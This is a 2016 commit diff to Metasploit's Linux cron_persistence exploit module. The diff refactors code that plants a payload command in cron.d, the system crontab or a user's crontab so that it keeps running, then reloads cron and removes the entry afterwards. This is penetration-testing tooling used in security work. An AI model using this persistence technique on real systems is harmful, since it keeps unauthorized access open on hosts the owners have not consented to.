fixes round 2

h00die · h00die · commit 33ce3ec3ed22 · 2016-07-15T08:44:39.000-04:00
diff --git a/modules/exploits/linux/local/cron_persistence.rb b/modules/exploits/linux/local/cron_persistence.rb
@@ -3,9 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-require 'msf/core/post/file'
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
@@ -31,15 +28,15 @@ def initialize(info = {})
         'Platform'       => ['unix', 'linux'],
         'Targets'        =>
           [
-            [ 'Cron',           { 'path' => '/etc/cron.d' } ],
-            [ 'User Crontab',   { 'path' => '/var/spool/cron' } ],
-            [ 'System Crontab', { 'path' => '/etc' } ]
+            [ 'Cron',           { :path => '/etc/cron.d' } ],
+            [ 'User Crontab',   { :path => '/var/spool/cron' } ],
+            [ 'System Crontab', { :path => '/etc' } ]
           ],
         'DefaultTarget'  => 1,
         'Arch'           => ARCH_CMD,
         'Payload'        =>
         {
-          'BadChars'   => "#%\x10\x13", # % always seems to fail, # is for comments
+          'BadChars'   => "#%\x10\x13", # is for comments, % is for newline
           'Compat'     =>
           {
             'PayloadType'  => 'cmd',
@@ -68,11 +65,11 @@ def exploit
     cron_regex << '(\*|[0-9]|1[0-2]|\*\/[0-9]+|jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec)\s+'
     cron_regex << '(\*\/[0-9]+|\*|[0-7]|sun|mon|tue|wed|thu|fri|sat)' # \s*
     # cron_regex << '(\*\/[0-9]+|\*|[0-9]+)?'
-    unless datastore['TIMING'] =~ %r{#{cron_regex}}
+    unless datastore['TIMING'] =~ /#{cron_regex}/
       fail_with(Failure::BadConfig, 'Invalid timing format')
     end
     cron_entry = datastore['TIMING']
-    if target.name =~ /User Crontab/
+    if target.name.include? 'User Crontab'
       unless user_cron_permission?(datastore['USERNAME'])
         fail_with(Failure::NoAccess, 'User denied cron via cron.deny')
       end
@@ -84,32 +81,34 @@ def exploit
     case target.name
     when 'Cron'
       our_entry = Rex::Text.rand_text_alpha(10)
-      write_file(target.opts['path'] + "/#{our_entry}", "#{cron_entry}\n")
-      vprint_good("Writing #{cron_entry} to #{target.opts['path']}/#{our_entry}")
+      write_file("#{target.opts[:path]}/#{our_entry}", "#{cron_entry}\n")
+      vprint_good("Writing #{cron_entry} to #{target.opts[:path]}/#{our_entry}")
       if datastore['CLEANUP']
-        register_file_for_cleanup("#{target.opts['path']}/#{our_entry}")
+        register_file_for_cleanup("#{target.opts[:path]}/#{our_entry}")
       end
     when 'System Crontab'
-      file_to_clean = "#{target.opts['path']}/crontab"
+      file_to_clean = "#{target.opts[:path]}/crontab"
       append_file(file_to_clean, "\n#{cron_entry}\n")
       vprint_good("Writing #{cron_entry} to #{file_to_clean}")
     when 'User Crontab'
-      file_to_clean = "#{target.opts['path']}/crontabs/#{datastore['USERNAME']}"
+      file_to_clean = "#{target.opts[:path]}/crontabs/#{datastore['USERNAME']}"
       append_file(file_to_clean, "\n#{cron_entry}\n")
       vprint_good("Writing #{cron_entry} to #{file_to_clean}")
-      # at least on ubuntu, we need to restart cron to get this to work
+      # at least on ubuntu, we need to reload cron to get this to work
       vprint_status('Reloading cron to pickup new entry')
-      cmd_exec("service cron restart")
+      cmd_exec("service cron reload")
     end
     print_status("Waiting #{datastore['WfsDelay']}sec for execution")
-    sleep(datastore['WfsDelay'].to_i)
+    Rex.sleep(datastore['WfsDelay'].to_i)
     # we may need to do some cleanup, no need for cron since that uses file dropper
     # we could run this on a on_successful_session, but we want cleanup even if it fails
     if file_to_clean && flag && datastore['CLEANUP']
       print_status("Removing our cron entry from #{file_to_clean}")
-      cmd_exec("perl -pi -e 's/.*#{flag}$//g' #{file_to_clean}")
+      cmd_exec("sed '/#{flag}$/d' #{file_to_clean} > #{file_to_clean}.new")
+      cmd_exec("mv #{file_to_clean}.new #{file_to_clean}")
+      # replaced cmd_exec("perl -pi -e 's/.*#{flag}$//g' #{file_to_clean}") in favor of sed
       if target.name == 'User Crontab' # make sure we clean out of memory
-        cmd_exec("service cron restart")
+        cmd_exec("service cron reload")
       end
     end
   end
